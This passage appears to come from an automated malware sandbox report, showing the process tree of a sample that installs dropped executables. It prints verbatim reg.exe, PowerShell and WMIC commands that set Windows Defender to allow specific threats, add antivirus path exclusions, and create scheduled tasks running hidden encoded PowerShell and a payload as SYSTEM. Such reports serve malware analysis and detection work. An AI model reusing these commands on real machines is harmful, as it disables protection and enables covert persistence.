                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:14440
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:14660
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:15144
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:15420
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:15648
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:15832
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:16120
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:16312
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:16480
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:16724
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:16948
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:17224
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:17480
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:17648
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:17940
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:18096
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:18236
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:18392
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:12016
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:18452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:18496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:18520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:18572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:18612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:18900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:19344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:18956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:13180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:13132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:13292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:13032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:12348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:13388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:13636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "gnDJSXBbE" /SC once /ST 09:03:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:13212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /run /I /tn "gnDJSXBbE"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "gnDJSXBbE"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:16756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "wovemSUpOFDwVyMam" /SC once /ST 17:16:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\gCRvjRb.exe\" 4h /site_id 668658 /S" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:16940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /run /I /tn "wovemSUpOFDwVyMam"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:17028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:18880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe XY /site_id 668658 /S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:15484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
